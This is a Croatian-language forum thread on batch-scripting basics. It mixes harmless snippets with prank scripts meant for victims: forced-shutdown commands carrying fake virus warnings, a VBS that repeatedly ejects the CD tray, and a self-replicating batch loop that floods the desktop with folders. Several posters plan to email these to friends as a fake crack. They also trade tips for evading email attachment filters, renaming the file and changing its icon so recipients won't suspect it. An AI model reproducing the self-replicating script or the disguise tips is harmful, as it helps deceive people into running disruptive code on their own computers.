Osnove batch-a zaključana tema

poruka: 134
|
čitano: 77.382
|
moderatori: Lazarus Long, XXX-Man, vincimus
+/- sve poruke
ravni prikaz
starije poruke gore
15 godina
online
Osnove batch-a

message box ne možeš napraviti u batchu.

Probaj s ovakvim nečim:

 

shutdown -s -t 10 -c "Press enter to ABORT"
pause
shutdown -a

Moja kanta: Intel Pentium DualCore E2180 2.00 GHz o/c 2.50 GHz, 2 GB rama, Gainward GeForce 8500GT
Moj PC  
0 0 hvala 0
15 godina
neaktivan
offline
RE: Osnove batch-a
UBIZEC cORPORATION kaže...

NERADI TI TO Exsaz!

 

Ovako treba ic kod ali az vbs skriptu znaci u notepad i dodas ekstenziju .vbs   ! a ne .bat

 

 

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
end if

 

 thx ubizec!! e jel mi mos rec kako da od toga napravim neki exe file da mogu poslat frendu kao cr*ck ili nes pa mu otvori? cd rom?
Moja konfa: :AMD Phenom X3 8450 :2 gb ram :ATI HD4650 1024mb :ASUS M2N68 Motherboard
15 godina
neaktivan
offline
RE: Osnove batch-a
jurluk kaže...

ej kako ide skripta za otvaranje i zatvaranje cd roma? mislim da sam to prije vidio negdje ali sam zaboravio Sramim se

evo  ovako (s time da se otvara i zatvara neovisno o tvojoj volji )...vise sprdnja :D
dakle :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
for i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
colCDROMs.Item(i).Eject
colCDROMs.Item(i).Eject
colCDROMs.Item(i).Eject
colCDROMs.Item(i).Eject
colCDROMs.Item(i).Eject
colCDROMs.Item(i).Eject
colCDROMs.Item(i).Eject
Next ' cdrom
End if





ovih "colCDROMs.Item(i).Eject" redova mozete stavit kolko god ocete..kolko ih stavite tolko puta ce vam se otvorit i zatvorit ladica CD/DVD-Roma : s 2....(dakle u ovoj skripti ima 8 tih redova znaci 4 puta ce vam se otvorit i zatvorit..)
to dakle kopirate u notepad i dodate ekstenziju .vbs
Poruka je uređivana zadnji put čet 19.3.2009 17:31 (nemesis777).
15 godina
offline
RE: Osnove batch-a
xxxxx kaže...

Ovo kad hoćeš prepast prijatelja evo ti jedan primjer:

 

shutdown -s -f -t 10 -c   "This is a virus!!!! Your Windows will be deleted!!!!!!!!!!!!!"

 

sada malo objašnjenje skripte:

"shutdown" - naredba   kojom možeš ugasiti računalo, restartirati, odlogirati se i sl.

"-s" - dodatak naredbi shutdown koji govori da se računalo treba ugasiti, da je naprimjer -r onda bi se restartiralo, -l da se odloguje i sl. ostale mogućnosti možeš vidjeti upisivanjem shutdown help

"-f" - zatvara sve programe bez pitanja

"-t" - odredi vrijeme za koje če se računalo ugasiti u sekundamatako da dodaš iza toga broj sekundi u ovom slučaju 10 (vidi naredbu)

"-c" - ispiše poruku na ekranu dok se računalo gasi, poruku moraš staviti u navodnike (vidi u primjeru)

 

nadam se da sam pomogao.

Skriptu možeš isprobati kod sebe da vidiš kako radi, ne može ti nikako naštetiti, i naravno znaš već da se sprema pod ekstenzijom .bat

 Hahahahahah..jel mi moze jos samo netko rec dal ce za ovaj file izbacit upozorenje da je virus il tak nesto..ako saljem mail-om??

Hvala ;))
15 godina
neaktivan
offline
RE: Osnove batch-a
B-52 kaže...
Hahahahahah..jel mi moze jos samo netko rec dal ce za ovaj file izbacit upozorenje da je virus il tak nesto..ako saljem mail-om??

Hvala ;))
 neće, jer je to obična batch skripta
16 godina
neaktivan
offline
Osnove batch-a

Što se tiče izbacivanja dialog box-a i sličnih window-a potražite ekvivalent zenity-a za Command Prompt ili Power shell. Možda nešto postoji.

Gentoo user. :')
Moj PC  
0 0 hvala 0
15 godina
offline
RE: Osnove batch-a
jurluk kaže...
B-52 kaže...
Hahahahahah..jel mi moze jos samo netko rec dal ce za ovaj file izbacit upozorenje da je virus il tak nesto..ako saljem mail-om??

Hvala ;))
 neće, jer je to obična batch skripta
 sad sam probo poslat fajl i nece..koristim thunderbird, pa jel to mozda ima kakve veze??
kaze nesto kao illegal attachment :)

EDIT: sad sam probo i direktno sa gmail-a poslat al kaze da je to kao executable file i ne smije iz sigurnosnih razloga poslat... a ak stavim u rar, onda frendica nece znat to otpakirat ;)))

Ma nea veze ;))
Poruka je uređivana zadnji put sub 21.3.2009 1:42 (B-52).
15 godina
neaktivan
offline
RE: Osnove batch-a
B-52 kaže...
jurluk kaže...
B-52 kaže...
Hahahahahah..jel mi moze jos samo netko rec dal ce za ovaj file izbacit upozorenje da je virus il tak nesto..ako saljem mail-om??

Hvala ;))
 neće, jer je to obična batch skripta
 sad sam probo poslat fajl i nece..koristim thunderbird, pa jel to mozda ima kakve veze??
kaze nesto kao illegal attachment :)

EDIT: sad sam probo i direktno sa gmail-a poslat al kaze da je to kao executable file i ne smije iz sigurnosnih razloga poslat... a ak stavim u rar, onda frendica nece znat to otpakirat ;)))

Ma nea veze ;))
 vidis danas sto si gluplji to si i sigurniji Belji se
http://ubizec.net46.net/forum http://www.ubizeccorporation.bloger.hr Posjeite forum za gaming,programiranje i izrada igara and hacking!
15 godina
online
Osnove batch-a

Napravi self-extract arhivu i onda probaj poslat.

Moja kanta: Intel Pentium DualCore E2180 2.00 GHz o/c 2.50 GHz, 2 GB rama, Gainward GeForce 8500GT
Moj PC  
0 0 hvala 0
15 godina
neaktivan
offline
Osnove batch-a

i pomogucnosti kad saljes taj fajl nazovi ga recimo skripte za fax ili tako nekako i promini ikonu u "folder" ikonu da nebude ikona od .bat file-a...da neko kolko god da je glup ne posumnja.. :D

Moj PC  
0 0 hvala 0
15 godina
online
RE: Osnove batch-a
jurluk kaže...
B-52 kaže...
Hahahahahah..jel mi moze jos samo netko rec dal ce za ovaj file izbacit upozorenje da je virus il tak nesto..ako saljem mail-om??

Hvala ;))
  neće, jer je to obična batch skripta
Da ali mnogi antivirusni se oglase ako u batch skripti ima @echo off
Moja kanta: Intel Pentium DualCore E2180 2.00 GHz o/c 2.50 GHz, 2 GB rama, Gainward GeForce 8500GT
15 godina
protjeran
offline
Osnove batch-a

oglasi se virus ako je skripta napravljena da obori sistem ili sta bilo da naskodi sistemu,odmah antivirus pokazuje kao virus....

Prati autora i njegove teme ako mislis da su za pratiti xD
 
0 1 hvala 0
15 godina
neaktivan
offline
RE: Osnove batch-a
nemesis777 kaže...

i pomogucnosti kad saljes taj fajl nazovi ga recimo skripte za fax ili tako nekako i promini ikonu u "folder" ikonu da nebude ikona od .bat file-a...da neko kolko god da je glup ne posumnja.. :D

 batch skriptama se ne mogu mjenjat ikone Belji se
15 godina
neaktivan
offline
RE: Osnove batch-a
jurluk kaže...
nemesis777 kaže...

i pomogucnosti kad saljes taj fajl nazovi ga recimo skripte za fax ili tako nekako i promini ikonu u "folder" ikonu da nebude ikona od .bat file-a...da neko kolko god da je glup ne posumnja.. :D

 batch skriptama se ne mogu mjenjat ikone Belji se
 da imas pravo ...
ikona se moze prominit ako se ( za onaj primjer ) napravi shortcut i isto to upise u shortcut...
i onda shortcutu prmomini naziv i ikona... :D

15 godina
offline
RE: Osnove batch-a
UBIZEC cORPORATION kaže...
 vidis danas sto si gluplji to si i sigurniji Belji se
 pa i to sta kazes ;)))
na kraju sam napravio spacku..evo jos sad se smijem...napiso sam upozorenje na hrvatskom i sve velikim slovima da bude vise upadljivo..i da..naravno da sam stavio simbolicno ime fajla ;)))
15 godina
neaktivan
offline
RE: Osnove batch-a

Samo napises sljdece:

@echo off

shutdown -s -t 00 -c "tvoja poruka ovdje."

15 godina
neaktivan
offline
Osnove batch-a

ja vam znam napraviti nekolicinu virusa u cmd-u...

sada ću vam napisati jedan vrlo nezgodan kod ali to NIJE virus neko prije logička bomba tako da neznam zašto bi me kaznili...ko zna, možda će nekome i trebati mlrd. ikona na desktopu...loooool...

 

@echo off

cd %homepath%/Desktop

:bono

md haha_%random%%random%%random%%random%%random%

start 0%

cd %homepath%/Desktop

goto bono

 

pošto sam odavno prestao rabiti command prompt (Batcheve ili tvz. cmd) ovo sam napisao iz sjećenja...

ovo trebate napisati u notepadu te datoteka>save as>(napišite neko ime...).bat>save

savjetujem vam da to ne pokrećete na svom compu...

 

sada ću vam objasniti sve ovo...

 

@echo off-kada se pokrene neće pokazivati šta radi nego će biti samo crni prozor

cd-to vam prebacuje na određenu lokaciju

%homepath%-to vas vodi direktno pred userov ekran ali ne i na desktop

/Desktop- pred userom se pokaže desktop a i vas usmjeri na njega

:bono-to vam je početak petlje...važno vam je da ima : a ono bono možete promjeniti u bilo šta ali pod uvjetom da onda i u naredbi goto stavite isto to što ide  poslije :

md- to vam stvara novi fajl

haha_%random%%random%%random%%random%%random%- to vam je ime fajla koji će se napraviti ali %random% vam je zapravo 5 nasumično odabranih brojava a to nam treba jer se nesmiju fajlovi zvati jednako jer će već kod prvog doći do greške...nikada nemojte stavljati više od 6 randoma ali to vam i netreba jer je to dovoljno za nekoliko mlrd. brojeva

start 0%-to vam pokreće opet ovaj program tako da su sada dva uključena

cd %homepath%/Desktop-već sam objasnio...

goto bono-to označava kraj petlje ali petlja će se ponavljati dokle god bude mogla a to je u našem slučaju dok se ne napravi puno mlrd. fajlova na desktopu...

 

 

 

 

P.S. autor nije odgovoran za bilo kakvu štetu nastalu korištenjem ovog programskog koda...ako neko želi još, neka me kontaktira na mail: bono1997@gmail.com

the genious is camed!!!
 
1 0 hvala 0
15 godina
neaktivan
offline
RE: Osnove batch-a

pa to nije ništa strašno. nakon svakog klika na ok se stvori 1 mapa. pa samo se ubije cmd.exe preko task managera i obrišu se nastale mape. ništa strašno Belji se

16 godina
neaktivan
offline
RE: Osnove batch-a
xxxxx kaže...

Ovo kad hoćeš prepast prijatelja evo ti jedan primjer:

 

shutdown -s -f -t 10 -c   "This is a virus!!!! Your Windows will be deleted!!!!!!!!!!!!!"

 

sada malo objašnjenje skripte:

"shutdown" - naredba   kojom možeš ugasiti računalo, restartirati, odlogirati se i sl.

"-s" - dodatak naredbi shutdown koji govori da se računalo treba ugasiti, da je naprimjer -r onda bi se restartiralo, -l da se odloguje i sl. ostale mogućnosti možeš vidjeti upisivanjem shutdown help

"-f" - zatvara sve programe bez pitanja

"-t" - odredi vrijeme za koje če se računalo ugasiti u sekundamatako da dodaš iza toga broj sekundi u ovom slučaju 10 (vidi naredbu)

"-c" - ispiše poruku na ekranu dok se računalo gasi, poruku moraš staviti u navodnike (vidi u primjeru)

 

nadam se da sam pomogao.

Skriptu možeš isprobati kod sebe da vidiš kako radi, ne može ti nikako naštetiti, i naravno znaš već da se sprema pod ekstenzijom .bat

 meni je taj batch upravo shebo windowse da sam ih morao ponovo instalirati,pokreno sam to i zaledio se comp,restarto ga i kod logon screena je bilo sve crno,samo sam mis vidio
AMD 5000+ Duo 2,6 Ghz.2 Gb 667 mhz Ram ATI 4670 512 DDR3
15 godina
neaktivan
offline
RE: Osnove batch-a
lol bravo,sta neznas uc u safe mod i izbrisat proces ?
http://ubizec.net46.net/forum http://www.ubizeccorporation.bloger.hr Posjeite forum za gaming,programiranje i izrada igara and hacking!
16 godina
neaktivan
offline
RE: Osnove batch-a
UBIZEC cORPORATION kaže...
lol bravo,sta neznas uc u safe mod i izbrisat proces ?
 e da bi htio safe mode radit napravio bi to
AMD 5000+ Duo 2,6 Ghz.2 Gb 667 mhz Ram ATI 4670 512 DDR3
15 godina
neaktivan
offline
Osnove batch-a

Evo jedna korisna skripta koju sam pronašao na web stranici

 

ECHO OFF
CLS
:MENU
ECHO.
ECHO ...............................................
ECHO PRESS 1 or 2 to select your task, or 3 to EXIT.
ECHO ...............................................
ECHO.
ECHO 1 - Export Favorites from COMPUTER to PERSONAL DRIVE (P:)
ECHO 2 - Import Favorites from PERSONAL DRIVE (P:) to COMPUTER
ECHO 3 - EXIT
ECHO.
SET /P M=Type 1, 2, or 3, then press ENTER:
IF %M%==1 GOTO EXPORT
IF %M%==2 GOTO IMPORT
IF %M%==3 GOTO EOF
:EXPORT
XCOPY "%userprofile%"\Favorites\*.* P:\Favorites\ /S/Y
GOTO MENU
:IMPORT
XCOPY P:\Favorites "%userprofile%"\Favorites\*.* /S
GOTO MENU

Moj PC  
1 0 hvala 0
15 godina
neaktivan
offline
RE: Osnove batch-a
Geralt-The Witcher kaže...
UBIZEC cORPORATION kaže...
lol bravo,sta neznas uc u safe mod i izbrisat proces ?
 e da bi htio safe mode radit napravio bi to
 nemoguce da ti je ta skripta unistila komp to je jadna obicna glupqa skripta za gasenje kompa i programa Bogataš ,mislim da je nes drugo posrijedi toga
http://ubizec.net46.net/forum http://www.ubizeccorporation.bloger.hr Posjeite forum za gaming,programiranje i izrada igara and hacking!
16 godina
neaktivan
offline
RE: Osnove batch-a
UBIZEC cORPORATION kaže...
Geralt-The Witcher kaže...
UBIZEC cORPORATION kaže...
lol bravo,sta neznas uc u safe mod i izbrisat proces ?
 e da bi htio safe mode radit napravio bi to
 nemoguce da ti je ta skripta unistila komp to je jadna obicna glupqa skripta za gasenje kompa i programa Bogataš ,mislim da je nes drugo posrijedi toga
 i ja sam se cudio tome al tako je kako sam napisao.ionak sam planirao reinstalirat windowseBelji se
AMD 5000+ Duo 2,6 Ghz.2 Gb 667 mhz Ram ATI 4670 512 DDR3
15 godina
neaktivan
offline
RE: Osnove batch-a

svako zlo za neko dobro :D

http://ubizec.net46.net/forum http://www.ubizeccorporation.bloger.hr Posjeite forum za gaming,programiranje i izrada igara and hacking!
Poruka je uređivana zadnji put pet 10.4.2009 22:14 (UBIZEC cORPORATION).
16 godina
neaktivan
offline
RE: Osnove batch-a

Dal neko zna kako se moze neki bat zastiti odnosno zakljcat da ga niko vise nemoze mjenjat? I dal se moze iz jednog bat fila pokrenut jedan vbs?

15 godina
neaktivan
offline
RE: Osnove batch-a
Nomad kaže...

Dal neko zna kako se moze neki bat zastiti odnosno zakljcat da ga niko vise nemoze mjenjat? I dal se moze iz jednog bat fila pokrenut jedan vbs?

 1.ne/mozes ga zakljucat al onda nece moc se pokrenut al ja zanm na kaj si ti mislio i odgovor je Ne
2.da
http://ubizec.net46.net/forum http://www.ubizeccorporation.bloger.hr Posjeite forum za gaming,programiranje i izrada igara and hacking!
16 godina
neaktivan
offline
RE: Osnove batch-a

A kako? comanda ako znas?!

16 godina
neaktivan
offline
Osnove batch-a

erm.. vbs je datoteka kao i sve ostale, samo prepusti cmd-u otvaranje

 
0 0 hvala 0
16 godina
neaktivan
offline
RE: Osnove batch-a

ne kuzim pojasni malo?! i zasto mi nikad nece iz jednog batcha otvorit  drugi? sta je comanda call ili start?

Nova poruka
E-mail:
Lozinka:
 
vrh stranice